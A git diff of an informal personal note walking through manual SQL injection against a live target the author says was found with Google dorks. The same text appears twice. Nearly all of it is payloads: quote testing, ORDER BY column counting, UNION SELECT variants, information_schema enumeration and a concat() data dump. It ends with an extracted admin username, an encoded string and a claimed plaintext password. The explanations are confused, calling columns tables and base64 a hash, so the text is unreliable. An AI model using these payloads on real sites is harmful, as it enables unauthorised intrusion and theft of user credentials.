ProgramFilesx86 · December 10, 2018 17:09
diff --git a/Mynoodmanualsqlinjec b/Mynoodmanualsqlinjec
 1= check vul (using google dorks of course)
      so i found a target and i'll excute on it 
      we'll check it by adding 'or'



 2= order injections {
 	               
 	               +order+by+1
 	               order by 1
 	               +order+by+1--
 }    so we will add number from 1 to 100 to guess number of the vulnerable tables
     the error message we be seems like Unknown numbers of columns or sum like this
     so in the number of 7 shown the error msg so the numbers of the tables is 6





 3= union injections (table_name from information_schema.tables && column_name,3 from information_schema.columns where table_name='users') {
 	                      we'll inject those codes
 	                         union select 1,2,3,4,5,6
 	                         union all select 1,2,3,4,5,6
 	                         union select 1,2,3,4,5,6--
 	                         +union+select 1,2,3,4,5,6
 	                         +union+all+select 1,2,3,4,5,6

 	                         to show us the vulnerable columns

 	                         so you see the vulnerable columns are 4 & 6
 	                         we'll inject in them 

 	                         so the purpose of tis injection is to know the names of the tables in the database
 	                         there's a table name with 'users' whoch we'll find users data on it

 	                         now to know the data on this table we'll inject 
 	                         folow me



 }
 4= using concat(1st ,0x3a, 2nd ,0x3a, ...) this is the final step to extract the data 
 we write concat(1st column , 2nd colum , 3rd column)



 so you we extract the data with id 1 and username admin and password TSphIWx1QDUla0BwIUw=
 the password is hashed by base64 (perhapse)

 so the pwd is M*a!lu@5%k@p!L
	1= check vul (using google dorks of course)
	so i found a target and i'll excute on it
	we'll check it by adding 'or'



	2= order injections {

	+order+by+1
	order by 1
	+order+by+1--
	} so we will add number from 1 to 100 to guess number of the vulnerable tables
	the error message we be seems like Unknown numbers of columns or sum like this
	so in the number of 7 shown the error msg so the numbers of the tables is 6





	3= union injections (table_name from information_schema.tables && column_name,3 from information_schema.columns where table_name='users') {
	we'll inject those codes
	union select 1,2,3,4,5,6
	union all select 1,2,3,4,5,6
	union select 1,2,3,4,5,6--
	+union+select 1,2,3,4,5,6
	+union+all+select 1,2,3,4,5,6

	to show us the vulnerable columns

	so you see the vulnerable columns are 4 & 6
	we'll inject in them

	so the purpose of tis injection is to know the names of the tables in the database
	there's a table name with 'users' whoch we'll find users data on it

	now to know the data on this table we'll inject
	folow me



	}
	4= using concat(1st ,0x3a, 2nd ,0x3a, ...) this is the final step to extract the data
	we write concat(1st column , 2nd colum , 3rd column)



	so you we extract the data with id 1 and username admin and password TSphIWx1QDUla0BwIUw=
	the password is hashed by base64 (perhapse)

	so the pwd is M*a!lu@5%k@p!L